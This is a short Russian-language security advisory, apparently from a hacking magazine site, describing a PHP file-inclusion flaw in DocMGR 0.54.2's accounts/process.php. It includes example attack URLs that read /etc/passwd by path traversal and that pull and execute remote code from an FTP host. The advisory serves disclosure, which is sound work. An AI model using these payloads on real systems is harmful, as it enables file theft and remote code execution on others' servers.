Хакер #305. Многошаговые SQL-инъекции
Программа: DocMGR 0.54.2, возможно более ранние
версии
Уязвимость существует из-за
недостаточной обработки входных данных в
параметрах "includeModule" и "siteModInfo" в
сценарии "/modules/center/admin/accounts/process.php".
Удаленный пользователь может с помощью
специально сформированного запроса
выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Удачная эксплуатация уязвимости возможна
при включенной опции "register_globals".
Инклюдинг локальных файлов возможен при
выключенной опции "magic_quotes_gpc".
Инклюдинг удаленных файлов возможен с
удаленного FTP сервера и требует наличие PHP 5
на целевой системе.
Примеры:
PHP 4:
http://[target]/[path_to_docmgr]/modules/center/admin/ accounts/process.php?includeModule=suntzu&
siteModInfo[suntzu][module_path]= ../../../../../../../../../etc/passwd%00
PHP 5:
http://[target]/[path_to_docmgr]/modules/center/admin/ accounts/process.php?includeModule=suntzu&siteModInfo
[suntzu][module_path]=ftp://username:password@somehost.com/